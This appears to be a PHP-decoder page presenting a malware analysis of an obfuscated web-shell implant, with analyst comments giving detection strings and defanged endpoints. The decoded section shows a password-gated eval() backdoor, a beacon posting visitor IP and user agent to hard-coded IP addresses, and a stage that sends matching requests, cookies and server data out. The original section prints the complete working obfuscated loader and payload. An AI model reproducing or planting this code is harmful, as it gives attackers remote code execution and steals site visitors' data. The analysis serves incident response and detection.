PHP Decode
$m05="qkTzghCNs8MEGiZnQDcWlbSJRvp1aOHtr6F23wuABUmoPfxK4dX5eY0jyLV7I_9";$fbf9=$m05[45].$m05..
Decoded Output download
// Password-gated remote code execution (web-shell stage).
// If the request has a POST field product_id whose MD5 equals the hard-coded
// digest, the POST field image_id is base64-decoded and handed to eval().
// The script then exits, so the host application never handles that request.
// product_id and image_id are written as bare (unquoted) array keys; on PHP 7
// these fall back to the strings of the same name with a notice or warning.
// Detection: the 32-hex digest literal is a stable string to search for in the
// webroot and in backups. Where POST bodies are logged (WAF, reverse proxy),
// look for requests that carry both product_id and a long base64 image_id.
if (
isset
( $_POST[product_id]) && md5($_POST[product_id])==="7624e600e055e1676a7a0728f0051c69"
){
eval( base64_decode(
$_POST[image_id]));exit();};
// Beacon / data-forwarding stage.
// $ar holds three base64-encoded endpoints. Decoded and defanged for egress-log
// and blocklist use:
//   hxxps://106.15.179[.]255
//   hxxps://103.139.113[.]14
//   hxxps://47.101.195[.]98
$ar=["aHR0cHM6Ly8xMDYuMTUuMTc5LjI1NQ==","aHR0cHM6Ly8xMDMuMTM5LjExMy4xNA==","aHR0cHM6Ly80Ny4xMDEuMTk1Ljk4"];
// Runs only when the request carries a POST field named prod_hash.
if(isset($_POST['prod_hash'])){
foreach ($ar as $v){
// Payload sent to every endpoint: the prod_hash value, the visitor's
// User-Agent header and the visitor's IP address.
$array = array(
'statistics_hash' => $_POST['prod_hash'],
'ua' => $_SERVER['HTTP_USER_AGENT'],
'cl_ip' => $_SERVER['REMOTE_ADDR']
);
$ch = curl_init(base64_decode($v));
curl_setopt($ch, CURLOPT_POST, 1);
// CONNECTTIMEOUT 0 selects libcurl's default connect timeout; the 3-second
// CURLOPT_TIMEOUT below is what actually bounds each request. With three
// endpoints, an unreachable set can add several seconds to the page load.
curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 0);
curl_setopt($ch, CURLOPT_TIMEOUT, 3);
curl_setopt($ch, CURLOPT_POSTFIELDS, $array);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
// Certificate and hostname verification are switched off (VERIFYPEER is set
// twice), so the HTTPS endpoints addressed by bare IP are accepted with any
// certificate.
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
curl_setopt($ch, CURLOPT_HEADER, false);
curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, false);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
// The response is captured in $html but never read in this script.
$html = curl_exec($ch);
curl_close($ch);
// Executed on every loop iteration: removes prod_hash and re-indexes $_POST
// numerically, so the host application no longer sees the original field names.
unset($_POST['prod_hash']);
$_POST = array_values($_POST);
}
}
// Request-inspection patterns (case-insensitive, dot matches newline).
// They match SQL statements touching tables named employee, admin_user or
// oc_user, prepared-statement injection via user variables, generic
// INSERT/UPDATE statements, a PHP open tag, file_put_contents calls and
// sleep()-based SQL.
// NOTE(review): the table names look like those of common e-commerce platforms,
// which would fit an implant aimed at shop software; confirm against the
// infected host.
$q=[
"#(select|insert|update).+?from.+?(employee|admin_user|oc_user)#is",
"#select.+into.+\@.+\;.+prepare.+\@#is",
"#insert.+into.+values#is",
"#update.+set.+where.+\=#is",
"#\<\?php#is",
"#file_put_contents[\( ]+#is",
"#select.+sleep\(.+\)#is",
];
// $f is the text that gets scanned: request parameters, upload metadata and cookies.
$f=json_encode($_REQUEST).json_encode($_FILES).json_encode($_COOKIE);
// $ff is the text that gets sent out on a match. It additionally contains all
// of $_SERVER, which includes request headers and server environment values.
$ff=json_encode($_REQUEST).json_encode($_SERVER).json_encode($_FILES).json_encode($_COOKIE);
$l=strtolower($f);
// Capture-and-neutralise stage. $q (pattern list), $l (lower-cased request
// text) and $ff (request plus $_SERVER dump) are built earlier in the script.
// Any request that matches a pattern is copied to a remote endpoint, and the
// superglobals are then emptied so the host application sees no input.
// There is no break, and $l is not recomputed after the wipe, so one request
// can be sent once per matching pattern.
// Incident-response impact: cookies and $_SERVER contents of matching requests
// left the server. Treat session identifiers and any secrets exposed through
// the server environment as disclosed.
foreach($q as $u){
// PHP function names are case-insensitive; the mixed-case spelling presumably
// serves to dodge case-sensitive string signatures for preg_match.
if(PREg_MaTch($u,$l)){
// Single endpoint, base64-encoded. Decoded and defanged: hxxps://47.101.195[.]98
$ar=["aHR0cHM6Ly80Ny4xMDEuMTk1Ljk4"];
foreach ($ar as $v){
// The whole dump is sent base64-encoded in one POST field named 'product'.
$array = array(
'product' => base64_encode($ff),
);
$ch = curl_init(base64_decode($v));
curl_setopt($ch, CURLOPT_POST, 1);
curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 0);
curl_setopt($ch, CURLOPT_TIMEOUT, 3);
curl_setopt($ch, CURLOPT_POSTFIELDS, $array);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
// TLS certificate and hostname checks are disabled for this transfer.
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
curl_setopt($ch, CURLOPT_HEADER, false);
curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, false);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
// Response is stored but not used.
$html = curl_exec($ch);
curl_close($ch);
}
// Wipe request input so the matching request has no effect on the host
// application. $_FILES and $_SERVER are left untouched.
$_REQUEST = array();
$_GET = array();
$_POST = array();
$_COOKIE = array();
}
}
Original Code
// Obfuscated loader. $m05 is a lookup alphabet; the three variables built from
// it by index spell function names, matching the "Function Calls" table:
//   $fbf9 = "function_exists", $ybc = "create_function", $l81 = "base64_decode"
// If create_function() exists, the base64 blob is decoded, compiled into an
// anonymous function and called. Every call is prefixed with @ to suppress errors.
// create_function() was removed in PHP 8.0, so on PHP 8+ the function_exists()
// guard fails and the payload never runs; the file is still an indicator of
// compromise.
// Detection: the $m05 alphabet string and the long run of indexed
// concatenations are stable strings to search for across the webroot.
$m05="qkTzghCNs8MEGiZnQDcWlbSJRvp1aOHtr6F23wuABUmoPfxK4dX5eY0jyLV7I_9";$fbf9=$m05[45].$m05[38].$m05[15].$m05[18].$m05[31].$m05[13].$m05[43].$m05[15].$m05[61].$m05[52].$m05[46].$m05[13].$m05[8].$m05[31].$m05[8];$ybc=$m05[18].$m05[32].$m05[52].$m05[28].$m05[31].$m05[52].$m05[61].$m05[45].$m05[38].$m05[15].$m05[18].$m05[31].$m05[13].$m05[43].$m05[15];$l81=$m05[21].$m05[28].$m05[8].$m05[52].$m05[33].$m05[48].$m05[61].$m05[49].$m05[52].$m05[18].$m05[43].$m05[49].$m05[52];if(@$fbf9($ybc)){$k47 = @$ybc('', @$l81('aWYJKAppc3NldAkKKAkkX1BPU1RbcHJvZHVjdF9pZF0pICAgJiYgCW1kNSgkX1BPU1RbcHJvZHVjdF9pZF0pPT09Ijc2MjRlNjAwZTA1NWUxNjc2YTdhMDcyOGYwMDUxYzY5IgopewpldmFsKCBiYXNlNjRfZGVjb2RlKCAKJF9QT1NUW2ltYWdlX2lkXSkpO2V4aXQoKTt9OwoKJGFyPVsiYUhSMGNITTZMeTh4TURZdU1UVXVNVGM1TGpJMU5RPT0iLCJhSFIwY0hNNkx5OHhNRE11TVRNNUxqRXhNeTR4TkE9PSIsImFIUjBjSE02THk4ME55NHhNREV1TVRrMUxqazQiXTsKaWYoaXNzZXQoJF9QT1NUWydwcm9kX2hhc2gnXSkpewogICAgZm9yZWFjaCAoJGFyIGFzICR2KXsKICAgICAgICAkYXJyYXkgPSBhcnJheSgKICAgICAgICAgICAgICAgICAgICAgICAgJ3N0YXRpc3RpY3NfaGFzaCcgICA9PiAkX1BPU1RbJ3Byb2RfaGFzaCddLAogICAgICAgICAgICAgICAgICAgICAgICAndWEnID0+ICRfU0VSVkVSWydIVFRQX1VTRVJfQUdFTlQnXSwKICAgICAgICAgICAgICAgICAgICAgICAgJ2NsX2lwJyA9PiAkX1NFUlZFUlsnUkVNT1RFX0FERFInXQoKICAgICAgICAgICAgICAgICAgICApOwogICAgICAgICRjaCA9IGN1cmxfaW5pdChiYXNlNjRfZGVjb2RlKCR2KSk7CiAgICAgICAgY3VybF9zZXRvcHQoJGNoLCBDVVJMT1BUX1BPU1QsIDEpOwogICAgICAgIGN1cmxfc2V0b3B0KCRjaCwgQ1VSTE9QVF9DT05ORUNUVElNRU9VVCwgMCk7CiAgICAgICAgY3VybF9zZXRvcHQoJGNoLCBDVVJMT1BUX1RJTUVPVVQsIDMpOwogICAgICAgIGN1cmxfc2V0b3B0KCRjaCwgQ1VSTE9QVF9QT1NURklFTERTLCAkYXJyYXkpOwogICAgICAgIGN1cmxfc2V0b3B0KCRjaCwgQ1VSTE9QVF9SRVRVUk5UUkFOU0ZFUiwgdHJ1ZSk7CiAgICAgICAgY3VybF9zZXRvcHQoJGNoLCBDVVJMT1BUX1NTTF9WRVJJRllQRUVSLCBmYWxzZSk7CiAgICAgICAgY3VybF9zZXRvcHQoJGNoLCBDVVJMT1BUX0hFQURFUiwgZmFsc2UpOwogICAgICAgIGN1cmxfc2V0b3B0KCRjaCwgQ1VSTE9QVF9TU0xfVkVSSUZZSE9TVCwgZmFsc2UpOwogICAgICAgIGN1cmxfc2V0b3B0KCRjaCwgQ1VSTE9QVF9TU0xfVkVSSUZZUEVFUiwgZmFsc2UpOwogICAgICAgICRodG1sID0gY3VybF9leGVjKCRjaCk7CiAgICAgICAgY3Vy
bF9jbG9zZSgkY2gpOwogICAgICAgIHVuc2V0KCRfUE9TVFsncHJvZF9oYXNoJ10pOwogICAgICAgICRfUE9TVCA9IGFycmF5X3ZhbHVlcygkX1BPU1QpOwogICAgfQp9CgokcT1bCgkiIyhzZWxlY3R8aW5zZXJ0fHVwZGF0ZSkuKz9mcm9tLis/KGVtcGxveWVlfGFkbWluX3VzZXJ8b2NfdXNlcikjaXMiLAoJIiNzZWxlY3QuK2ludG8uK1xALitcOy4rcHJlcGFyZS4rXEAjaXMiLAoJIiNpbnNlcnQuK2ludG8uK3ZhbHVlcyNpcyIsCgkiI3VwZGF0ZS4rc2V0Lit3aGVyZS4rXD0jaXMiLAoJIiNcPFw/cGhwI2lzIiwKCSIjZmlsZV9wdXRfY29udGVudHNbXCggXHRdKyNpcyIsCgkiI3NlbGVjdC4rc2xlZXBcKC4rXCkjaXMiLApdOwoKCiRmPWpzb25fZW5jb2RlKCRfUkVRVUVTVCkuanNvbl9lbmNvZGUoJF9GSUxFUykuanNvbl9lbmNvZGUoJF9DT09LSUUpOwokZmY9anNvbl9lbmNvZGUoJF9SRVFVRVNUKS5qc29uX2VuY29kZSgkX1NFUlZFUikuanNvbl9lbmNvZGUoJF9GSUxFUykuanNvbl9lbmNvZGUoJF9DT09LSUUpOwokbD1zdHJ0b2xvd2VyKCRmKTsKCmZvcmVhY2goJHEgYXMgJHUpewoJaWYoUFJFZ19NYVRjaCgkdSwkbCkpewoKCgoJCSRhcj1bImFIUjBjSE02THk4ME55NHhNREV1TVRrMUxqazQiXTsKCSAgICBmb3JlYWNoICgkYXIgYXMgJHYpewoJICAgICAgICAkYXJyYXkgPSBhcnJheSgKCSAgICAgICAgICAgICAgICAgICAgICAgICdwcm9kdWN0JyAgID0+IGJhc2U2NF9lbmNvZGUoJGZmKSwKCSAgICAgICAgICAgICAgICAgICAgKTsKCSAgICAgICAgJGNoID0gY3VybF9pbml0KGJhc2U2NF9kZWNvZGUoJHYpKTsKCSAgICAgICAgY3VybF9zZXRvcHQoJGNoLCBDVVJMT1BUX1BPU1QsIDEpOwoJICAgICAgICBjdXJsX3NldG9wdCgkY2gsIENVUkxPUFRfQ09OTkVDVFRJTUVPVVQsIDApOwoJICAgICAgICBjdXJsX3NldG9wdCgkY2gsIENVUkxPUFRfVElNRU9VVCwgMyk7CgkgICAgICAgIGN1cmxfc2V0b3B0KCRjaCwgQ1VSTE9QVF9QT1NURklFTERTLCAkYXJyYXkpOwoJICAgICAgICBjdXJsX3NldG9wdCgkY2gsIENVUkxPUFRfUkVUVVJOVFJBTlNGRVIsIHRydWUpOwoJICAgICAgICBjdXJsX3NldG9wdCgkY2gsIENVUkxPUFRfU1NMX1ZFUklGWVBFRVIsIGZhbHNlKTsKCSAgICAgICAgY3VybF9zZXRvcHQoJGNoLCBDVVJMT1BUX0hFQURFUiwgZmFsc2UpOwoJICAgICAgICBjdXJsX3NldG9wdCgkY2gsIENVUkxPUFRfU1NMX1ZFUklGWUhPU1QsIGZhbHNlKTsKCSAgICAgICAgY3VybF9zZXRvcHQoJGNoLCBDVVJMT1BUX1NTTF9WRVJJRllQRUVSLCBmYWxzZSk7CgkgICAgICAgICRodG1sID0gY3VybF9leGVjKCRjaCk7CgkgICAgICAgIGN1cmxfY2xvc2UoJGNoKTsKCSAgICB9CgkJJF9SRVFVRVNUID0gYXJyYXkoKTsKCQkkX0dFVCA9IGFycmF5KCk7CgkJJF9QT1NUID0gYXJyYXkoKTsKCQkkX0NPT0tJRSA9IGFycmF5KCk7Cgl9Cn0='));@$k47();}
Function Calls
base64_decode | 1 |
create_function | 1 |
function_exists | 1 |
Stats
MD5 | a5265af22d7520c2c0821b4bdce8c422 |
Eval Count | 1 |
Decode Time | 331 ms |